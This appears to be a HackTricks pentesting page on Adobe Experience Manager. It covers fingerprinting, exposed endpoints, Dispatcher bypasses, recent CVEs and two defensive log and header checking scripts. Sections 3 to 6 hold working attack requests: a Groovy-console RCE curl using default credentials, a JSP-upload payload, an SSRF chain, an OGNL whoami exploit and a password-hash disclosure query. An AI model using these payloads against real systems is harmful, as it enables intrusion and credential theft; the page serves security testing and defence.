AEM (Adobe Experience Manager) Pentesting
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR). From an attacker's point of view, AEM instances frequently expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long list of CVEs that are patched every quarter.
The checklist below focuses on the externally reachable (unauthenticated) attack surface that regularly shows up in real engagements (2022-2026).
1. Fingerprinting
```
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```
Other quick indicators:
- /etc.clientlibs/ static path present (returns JS/CSS).
- /libs/granite/core/content/login.html login page with the "Adobe Experience Manager" banner.
- </script><!--/* CQ */--> comment at the end of the HTML.
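The script below is an added example, not code from the original page or from any of the tools it mentions. It parses a raw HTTP response (the constructed sample is embedded inline) and reports which of the fingerprint indicators listed above it leaks, so an operator can confirm what their own instance gives away and strip headers or comments they do not want exposed. The header labels and the regular expressions are assumptions for the example.

```python
"""Added example (not from the original page): inventory which AEM
fingerprint indicators a raw HTTP response leaks. Sample below is constructed."""
import re

# Constructed sample response (headers + HTML body), as `curl -i` would show it.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Dispatcher: hu1\r\n"
    "X-Vary: Accept-Encoding\r\n"
    "Content-Type: text/html;charset=utf-8\r\n"
    "\r\n"
    "<html><head><title>Adobe Experience Manager</title>\n"
    '<link rel="stylesheet" href="/etc.clientlibs/foo/clientlibs/site.css">\n'
    '<script src="/etc.clientlibs/granite/utils.js"></script>\n'
    "</head><body>...</body>\n"
    "<!--/* CQ */-->\n</html>\n"
)

# Header names that identify AEM/Dispatcher (labels are assumptions).
HEADER_INDICATORS = {
    "x-dispatcher": "AEM Dispatcher header",
    "x-vary": "header seen on AEM Dispatcher responses",
}
# Body patterns for the indicators listed on the page.
BODY_PATTERNS = {
    "clientlibs_path": re.compile(r"/etc\.clientlibs/[^\"' )]+"),
    "cq_comment": re.compile(r"<!--/\*\s*CQ\s*\*/-->"),
    "login_banner": re.compile(r"Adobe Experience Manager"),
}


def split_response(raw):
    """Split a raw HTTP/1.x response into (status line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def aem_indicators(raw):
    """Return {indicator: evidence} for every AEM fingerprint found in `raw`."""
    _, headers, body = split_response(raw)
    found = {}
    for name, label in HEADER_INDICATORS.items():
        if name in headers:
            found[name] = f"{label}: {headers[name]}"
    for key, pattern in BODY_PATTERNS.items():
        match = pattern.search(body)
        if match:
            found[key] = match.group(0)
    return found


if __name__ == "__main__":
    for key, evidence in aem_indicators(SAMPLE_RESPONSE).items():
        print(f"{key:16s} {evidence}")
```

A response with none of these indicators returns an empty dict, which is the state a hardened public instance should be in; the `X-Dispatcher` header in particular can be removed at the Dispatcher/Apache layer.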
2. High-value unauthenticated endpoints
| Path | What you get | Notes |
|---|---|---|
| /.json, /.1.json | JCR nodes via DefaultGetServlet | Usually blocked, but the Dispatcher bypass (see below) works. |
| /bin/querybuilder.json?path=/ | QueryBuilder API | Leaks the page tree, internal paths, usernames. |
| /system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 by default; if exposed and creds are obtained → bundle-upload RCE. |
| /crx/packmgr/index.jsp | Package Manager | Allows authenticated content-package upload → JSP payload upload. |
| /etc/groovyconsole/** | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution. |
| /libs/cq/AuditlogSearchServlet.json | Audit logs | Information disclosure. |
| /libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS vector. |
| /adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint evaluates OGNL without authentication → RCE. |
Dispatcher bypass tricks (still working in 2025/2026)
Production sites usually sit behind the Dispatcher (reverse proxy). Its filter rules are often bypassed using encoded characters or allowed static extensions.
Classic semicolon + allowed extension
```
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```
Encoded slash bypass (2025 KB ka-27832)
```
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
```
If the Dispatcher allows encoded slashes, this returns JSON even when /bin is supposedly denied.
3. Common misconfigurations (still present in 2026)
- Anonymous POST servlet → POST /.json with :operation=import lets you import new JCR nodes. Blocking *.json POST in the Dispatcher fixes it.
- World-readable user profiles → the default ACL grants everyone jcr:read on /home/users/**/profile/*.
- Default credentials → admin:admin, author:author, replication:replication.
- WCMDebugFilter enabled → reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
- Groovy Console exposed → remote code execution by posting a Groovy script:
```
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
```
- Dispatcher encoded-slash gap → /bin/querybuilder.json and /etc/truststore.json are reachable via %2f / %3B even when they are blocked by path filters.
- AEM Forms Struts devMode left enabled → /adminui/debug?expression= evaluates OGNL without auth (CVE-2025-54253), giving unauth RCE; combined with the XXE in Forms submission (CVE-2025-54254) it allows file reads.
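The bypasses in sections 2 and 3 work because a filter that matches on the raw URL never sees the path Sling actually resolves. The script below is an added example (not code from the original page, from Adobe or from aem-hacker) that canonicalises each request target the way Sling does, then applies deny rules to the canonical path and flags the ';' suffix, encoded-slash and POST-to-.json patterns over a few constructed Apache-style access-log lines. The log lines, IP addresses and deny list are constructed for the example; the deny list is taken from the endpoint table above.

```python
"""Added example (not from the original page or from aem-hacker): canonicalise
request targets the way Sling resolves them and apply Dispatcher-style deny
rules to the canonical path, so ';' suffixes and encoded slashes no longer
slip past a filter that only looks at the raw URL. Log lines, IPs and the
deny list below are constructed for the example."""
import re
from urllib.parse import unquote

# Constructed access-log sample in Apache combined-log style (not real traffic).
SAMPLE_LOG = r'''
203.0.113.7 - - [10/Jan/2026:10:01:02 +0000] "GET /content/site/en.html HTTP/1.1" 200 5123
203.0.113.7 - - [10/Jan/2026:10:01:05 +0000] "GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1" 200 9812
203.0.113.7 - - [10/Jan/2026:10:01:09 +0000] "GET /%2fbin%2fquerybuilder.json?path=/etc HTTP/1.1" 200 4411
198.51.100.9 - - [10/Jan/2026:10:02:00 +0000] "POST /.json HTTP/1.1" 200 77
198.51.100.9 - - [10/Jan/2026:10:02:30 +0000] "GET /content/site/en.html?debug=layout HTTP/1.1" 200 6000
198.51.100.9 - - [10/Jan/2026:10:03:00 +0000] "GET /etc.clientlibs/site/clientlibs/site.css HTTP/1.1" 200 3000
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumed deny list (from the endpoint table on this page), matched against
# the CANONICAL path rather than the raw URL.
DENY_PREFIXES = ("/bin/", "/system/console", "/crx", "/etc/groovyconsole",
                 "/adminui/debug", "/libs/cq")
DENY_QUERY_KEYS = {"debug"}  # WCMDebugFilter trigger


def canonical(target):
    """Reduce a raw request target to the resource Sling would resolve.

    1. split off the query string
    2. percent-decode twice (covers %252f double encoding)
    3. drop ';...' path parameters (the classic ';%0aa.css' trick)
    4. collapse '//' left behind by a decoded leading %2f
    5. split the last segment into resource / selectors / extension
    """
    path, _, query = target.partition("?")
    decoded = unquote(unquote(path))
    decoded = decoded.split(";", 1)[0]
    decoded = re.sub(r"/+", "/", decoded)
    head, _, last = decoded.rpartition("/")
    parts = last.split(".")
    resource, ext = parts[0], (parts[-1] if len(parts) > 1 else "")
    return {
        "path": head + "/" + resource,
        "ext": ext,
        "query": query,
        "obfuscated": decoded != path,  # decoding or ';' stripping changed it
    }


def findings(method, c):
    """Apply deny rules to a canonicalised request; return reasons to alert."""
    out = []
    if any(c["path"].startswith(p) for p in DENY_PREFIXES):
        out.append("denied path " + c["path"])
    if method == "POST" and c["ext"] == "json":
        out.append("POST to .json (Sling POST servlet)")
    keys = {kv.split("=", 1)[0] for kv in c["query"].split("&") if kv}
    if keys & DENY_QUERY_KEYS:
        out.append("debug query parameter")
    if c["obfuscated"]:
        out.append("path obfuscation (encoded slash or ';' suffix)")
    return out


def scan_log(text):
    """Return one alert dict per log line that trips a rule."""
    alerts = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        c = canonical(m.group("target"))
        hits = findings(m.group("method"), c)
        if hits:
            alerts.append({"ip": m.group("ip"), "method": m.group("method"),
                           "target": m.group("target"), "canonical": c["path"],
                           "findings": hits})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f'{a["ip"]:14s} {a["method"]:4s} {a["target"]}')
        print(f'{"":14s}   -> {a["canonical"]}: {"; ".join(a["findings"])}')
```

The same canonicalise-then-deny order is what a correct Dispatcher ruleset needs: deny everything by default and allow only the content paths and extensions the site serves, deny POST for the json extension, and keep Apache's `AllowEncodedSlashes` at its default of Off so a `%2f` never reaches the filter in the first place.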
4. Recent vulnerabilities (service-pack cadence)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) → upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). |
| Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via crafted URL. |
Always check the APSB bulletin matching the customer's service pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.
5. Exploitation snippets
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
```
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```
Now request /content/evil.jsp → the JSP runs as the AEM process user.
5.2 SSRF to RCE (historical < 6.3)
```
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
```
aem_ssrf2rce.py from aem-hacker automates the whole chain.
5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
```
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
```
If vulnerable, the HTTP body shows the command output.
5.4 QueryBuilder hash disclosure (encoded slash bypass)
```
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
```
Returns user nodes, including rep:password hashes, when the anonymous read ACLs are at their defaults.
6. Tools
- aem-hacker → Swiss-army enumeration script; supports dispatcher bypass, SSRF detection, default-creds checks and more.
```
python3 aem_hacker.py -u https://target --host attacker-ip
```
- Tenable WAS plugin 115065 → detects the QueryBuilder hash disclosure and encoded-slash bypass automatically (published December 2025).
- Content brute-force → request /_jcr_content.(json|html) in sequence to discover hidden components.
- osgi-infect → upload a malicious OSGi bundle via /system/console/bundles if creds are available.
References
- Adobe Security Bulletin APSB25-115 - Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer - Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)